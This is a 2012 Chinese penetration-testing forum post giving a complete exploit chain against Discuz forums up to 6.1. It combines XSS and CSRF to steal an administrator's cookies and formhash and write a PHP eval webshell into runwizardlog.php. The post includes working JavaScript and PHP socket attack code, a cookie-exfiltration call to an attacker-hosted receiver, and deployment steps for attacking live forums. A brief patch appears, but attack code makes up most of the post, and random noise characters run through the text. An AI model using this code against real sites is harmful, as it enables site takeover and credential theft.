中国网络渗透测试联盟

标题: Discuz XSS得webshell [打印本页]

作者: admin    时间: 2012-9-13 17:11
标题: Discuz XSS得webshell
Discuz XSS得webshell7 i- ~7 G* V2 y
By racle @tian6.com& ?3 y& }! t2 a4 U/ V
欢迎转帖.但请保留版权信息.
; e6 @- J) T' M/ P' l受影响版本iscuz<=6.1.0,gbk+utf+big5
7 i/ U9 C. s% u& a0 ~7 {# Q( e
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.2 |. N* D: Y3 M  c% n3 R0 M

9 i3 |! M- E- p$ U6 W, }" X3 q6 r; @7 Y7 x- W9 r7 G1 {
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706, a3 t) M$ t  f( t) [
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
: R  `" `" _3 |+ q+ X$ P5 D' @# T. W' u& K* |
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
  \; p# w% }9 `+ x% `! j本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
/ {$ C. T  t5 c0 M
5 ^: Q8 w# D" ]
3 I) N9 F1 t# V7 V  f7 A8 l----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
0 c; v; |9 X. W
" t( e% M, K0 Q6 P: O% ~
- G7 L3 g1 Z  N  Q, d9 c6 Jproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.! }% U  ^7 |  J6 X; ^

6 B9 S* K: O% P4 j" F& Sproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.; X3 u- ^& Z7 ^. p- M

/ _5 c9 L0 z3 c0 F/ Eproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.9 `9 x+ U# c2 {& |
& D- ?, c( k! S: s

! b) r- ^& e: F7 n- M下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {8 j& M4 A2 T7 H
: w) Y" B2 Q" C8 _7 q7 L
        global $runwizardfile, $runwizardhistory;' y; C) D* G7 Z3 z

6 b8 O) m: c8 K9 a5 Y        $fp = fopen($runwizardfile, 'w');
! K6 p$ u( \) v  @' D
# u" V9 x0 j- M7 C( H        fwrite($fp, serialize($runwizardhistory));* @# }  ?! O9 S5 k' M* w; Z$ m
5 v3 O- w, U8 m3 ~) ?
        fclose($fp);1 q- L. C+ W' V3 ]+ z1 u5 n
4 D5 s6 A$ h1 b7 d0 L
}" _' O. C: W' D! c! Y
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
" o8 ?& Y& c' G  q9 Q4 a' h( I6 n以下是修补的办法:function saverunwizardhistory() {
& i; L( ?- w0 C8 x6 v& J
& X8 h5 G3 D- S2 W7 D! v, c        global $runwizardfile, $runwizardhistory;4 B* d! J$ c2 `: T4 {  l

1 ~, }$ f* o# R3 D# d        $fp = fopen($runwizardfile, 'w');6 u0 W8 C1 T. b; Q  m( O7 b4 i. k
* D4 F0 [9 r2 r, ^5 m- {* B
        $s = '<?php exit;?>';
% k& Q5 v8 t& |2 ~3 c$ Y4 p4 Y& {; S7 t; g- |, Y
        $s .= serialize($runwizardhistory);) t: {0 y* G' z* ~8 J

  f! U5 |0 l2 j' x; U2 x! h        fwrite($fp, $s);( m5 J  ?; ]7 A0 L* _9 E* N
3 Z6 l4 Y! L! Y" q0 ?& R2 E8 @
        fclose($fp);' x5 R' h5 ]8 l" e3 B

& k4 I! v: i, @8 [' B}* M6 ?1 g8 Y  }; q' J8 z& `/ v+ }
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行./ p8 T! l' l5 G% @( S$ G* @

% I9 x+ @. ^# |7 ^& {5 s% Q; C- u4 k2 C, Y
( N! L2 R' I5 L( k/ Z* j
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------& a! A9 ]! Z9 X3 |# i+ z* V: }

1 B# ]: Z+ C& H3 D
: n" j9 _) J* b  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
4 _+ h& l- U; k, z' R. c! b+ o0 v1 ^% X/ M0 A3 `
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.$ I! w# N! |& b; U. f
6 p- V2 \( b% y# H7 T
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
0 s1 ?+ \- t# g+ S9 H/ ^: i& C4 j6 q9 y0 c' w4 y
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
/ w  N) o% R  K' @5 E( G  F, p
) N6 D# z# [+ F- W, P4 N$ Dvar url="http://目标网站/admincp.php";      
2 j$ ?" A* P4 s' S
! j) o2 u; G" F6 b' c, ]' D, M/*获得cookies*/0 i# P4 b0 O) h- \8 Q6 V0 ^) {
7 F5 u7 |  Q% z# T3 M5 ~' F6 q! u
function getURL(s) {  C. T/ B% o# b; O+ s

4 o! T  e' _$ I6 u8 Mvar image = new Image();* z9 N" J& b+ m7 z+ H% k- D* ?

3 O, ^" X4 e9 U! S$ kimage.style.width = 0;+ {4 x, K+ q5 \3 U. U5 _/ Z" ^
6 j) V% w2 L6 v
image.style.height = 0;
+ X; b8 O# P6 n
  W  B7 Q6 i! l: q2 g: Vimage.src = s;
8 [9 c1 x4 F9 F* T/ B! D+ j. k) d3 f5 R' A' }6 T+ a  x/ z
}
! L2 ^$ Y) J: C8 w
* k, Z- R6 m1 {# T! X5 cgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
1 ]) h/ |6 _% E* L6 {$ x) ]6 _复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
8 c" E, o' u& [5 J6 H+ f8 D复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 9 k/ Y: j% h3 C( `8 [

4 M+ \& K; a9 Y  \3 e' z9 [
9 \( B/ L3 l% k/ f6 T获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
! v) C+ V. E! f9 b9 K9 T2 b9 p+ g  ~  ?/ Q) D& i

9 m; Z) u' `, X0 h
0 {3 A0 l  l" ^  ^# `7 I/ b/*hash*/1 I0 E2 \0 ^" u$ w; S: u* |
$ L9 q; K8 M; ?8 N% l$ d. [
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");* @" ^  t" t  U+ a% p+ m

& W% h7 H: y( }: g" b# N' L: \xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
$ t1 C  ]: A! m* P, q
+ n+ b4 @) g) r! E! OxmlHttpReq.send();
  ^5 Y; W: _( ?1 P& x- n
5 r; ]' a0 O$ p1 g! rvar resource = xmlHttpReq.responseText;
: e. u; J: i# y7 b3 r( A; y) r0 Q, N3 c9 |  Y/ e
var numero = resource.search(/formhash/);  I5 ]1 Q4 s& }' U$ _5 \2 Y7 x# K
  H( e7 b, v& s
var formhash=encodeURIComponent(resource.substr(numero+17,8));' W  e  @6 ~2 x- u; F
! G$ M) K2 R" V& v
# p* c0 D2 y- K( |6 c+ u
8 Y+ j1 n3 L( W
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 ' |  B3 u( d, `

& {6 m% r4 N4 W. B7 UxmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 8 M# |, |9 w/ E/ q0 E- h

% X+ h# z+ B" b" c2 y  BxmlHttpReq.setRequestHeader("Referer", url);
# I% W2 |# ~, ^* q1 n7 R8 }5 @% T* p' {' {, e0 L2 d4 H
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");! ^+ y4 C# a* M# L" b7 t; s
: Y  N+ n% a5 ^* `+ g- O0 ~
xmlHttpReq.setrequestheader("content-length",post.length); * i1 ^& U7 Q3 l' G1 A: L
, _6 ~( h8 ]2 ?6 N
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
4 O9 a: O0 C% v: ^
7 `0 S4 d! b" K, v% @0 hxmlHttpReq.send(post);//发送数据/ J" V$ Q, p/ s7 P, c7 [
复制代码这里HASH我假设正确,这样提交,也无须cookies
. l0 x2 t, L1 T) ~- j/ F! p# r; ]  \( D8 s
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
  ?" d* B( G8 d8 _' I8 t4 v* K5 m) E4 [" {% [
if (!$sock) die("$errstr ($errno)\n");8 r3 R9 R, i  J2 f0 S2 V( n! c

, L* z- |. d8 t+ N4 i. l$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
5 ?# L- M- o, k! R
$ H% N0 p8 c8 O3 _! v( t
' m8 C1 [$ w8 v; j$ W9 T' {  O4 ]4 S) y! s! w4 _0 r
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
' m2 K3 K( Q+ P9 \$ c+ G: ~2 a) {- ^+ t2 [) e
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");% s. T, Y  M2 m- ~- r1 C% Y
; J$ E! I7 M1 ]! `" X& |
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");# v8 z/ ]+ Z$ v
% _( r. A. o7 W# S/ ^. U  W
fwrite($sock, "Accept-Language: zh-cn\r\n");0 N  T1 U! ^" e) Y9 a5 _3 U" E) X

2 m/ ^- _6 X* U# X1 ?2 L; o( Ifwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");' {+ \8 _1 h; Q; h8 O
8 s$ _  ~8 O  m' \( F
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");$ g! ?' j5 p  F, t5 x& i% }( U
8 f  p1 a5 t0 o: i* h' W
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");! w) O5 h& H4 ?! H. R

9 f" R1 P, c) l0 lfwrite($sock, "Host: $url\r\n");3 O4 l0 v4 Y$ B. X" C2 l

: f0 o& k" ]& V, p' i9 @0 sfwrite($sock, "Content-Length: ".strlen($data)."\r\n");
+ z2 I9 K' ]) O5 _* g7 h( ~
6 @' J4 K. o: p2 _4 K/ [fwrite($sock, "Connection: Keep-Alive\r\n");
9 C! Q8 _/ O6 g+ x: c" W4 [: W5 s$ w! Z, q; n/ a3 H
fwrite($sock, "Cache-Control: no-cache\r\n");
4 d6 m: z, c7 ^4 S6 b7 s# h) |+ v7 F; a+ _" _; F
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");$ |) q% S( X+ U/ z) n

+ m) j6 K7 l7 }8 c2 P$ \3 J6 Ufwrite($sock, $data);: k: n3 J0 w! f2 ~! `
) Z) j- Z2 P' E+ N1 B/ G
4 M$ t+ [& f8 p- L( A3 n% H

8 Z% m2 l* Z6 V$headers = "";
% C! a  O6 E+ ~: i' ]9 d7 ~
: s1 q1 ]6 v4 z/ G* A( awhile ($str = trim(fgets($sock, 4096)))
( M1 }% m6 Q2 M. \0 j$ v) j/ h1 x3 y# x$ g2 u" W/ H2 I+ {
     $headers .= "$str\n";
! L3 a2 E3 }- g2 R* h: O3 z. ^* }2 K! y1 H( F( L& ]
echo "\n";2 e7 w2 Z) F2 Y, z: I" Y- D

# s6 m9 S( y1 j. P1 p9 ]$body = "";5 f# R6 W; b$ o$ U5 @; b$ i3 H
! b; K$ k+ O$ s+ V0 s& w, G+ I9 ~5 ~
while (!feof($sock))
- [5 Q0 Q' }( ~6 ]0 V- ?
' [+ Q! P. X5 V; G$ v     $body .= fgets($sock, 4096);
0 N; c: r% J4 R* D+ E. ~* I/ e
: t( [. H1 m' H6 y5 gfclose($sock);! l7 w4 F" T/ `$ k* `

* |* ]5 Y: ^- E  x3 Techo $body;
8 u4 m; A( v1 B) @0 q! ~复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^* N/ j' f6 J5 ^* ~5 Q1 t* S1 s

3 w# _9 D' {' N0 m- ?4 {' I' j* i  a4 n! m* N! q
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------+ Z: Q' {  L9 f6 |$ j5 M8 h
/ f. E) ^. l7 n7 A: z
+ k: X! A! ?& j, {
1HP SOCKET利用方法首先打开racle.js+ ~' I/ O9 E5 @8 p

8 }" o0 |1 J. |) Xvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home. e4 E" F! y3 {3 ~! L$ P8 _- i

3 S" }& b1 |$ `
: C. j: a' [; X2 Q7 X0 V8 ^8 H8 q) z/ d+ e/ c7 T+ s
然后打开racle@tian6.php4 y0 c9 t: ?( U; h2 F* k
% g( d5 F4 U5 x/ G. {
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
: Y# B0 O' \6 b) @5 x0 S- s8 z$ e9 y! s
1 h- z1 q  Q0 f" ^4 ^
6 V7 z3 {; ^' i- o  o* _# E
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:6 ~3 ^& M! w2 m8 h$ T
) o3 c) }0 o' R: d& g$ c
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
8 R2 p/ U+ ^/ d" y& [. a& g& N
6 V2 o5 a$ `/ X8 K# G" K5 ], |% B9 l* O! B' E* j8 \
2 J/ ~( N- e( m- ]2 [9 W  a1 N
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));2 X$ C6 P1 m+ Z% d
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
8 x) @, t- x2 e2 m/ J/ {. `4 L% r$ c  \# @9 T6 H  E
; K. F$ Y% k- T
8 A' J3 q7 c" V. e
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
1 [9 ~$ ^5 R1 Q% p: |* U( K+ |3 v' r5 I
var formhash=encodeURIComponent(resource.substr(numero+17,8));
- X+ a" K2 D+ V& z+ `. v. k: t: N6 H$ S3 c8 ?

$ ^: k! @& Y  M. {- |2 [  A! p( v; u/ \0 Y, _, x1 {8 N& ]
var formhash=encodeURIComponent(resource.substr(numero+9,8));# f. z% X7 [$ C. c; k0 S3 p& E2 T4 Z
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
7 }$ o1 [& p+ x, ~5 l$ @
# r4 z( ^! n9 g5 d% ~; {4 U5 _如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.8 s+ c# b* l0 T: a) p

; Y8 v4 A3 O8 h+ {6 {' J0 n如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
# t& X0 p* E* h
. x7 @3 t; D" A; p" l( c& p. M6 J不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
4 D% K2 _7 _5 p$ ]
' ^9 `! f7 T; y2 `0 i




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2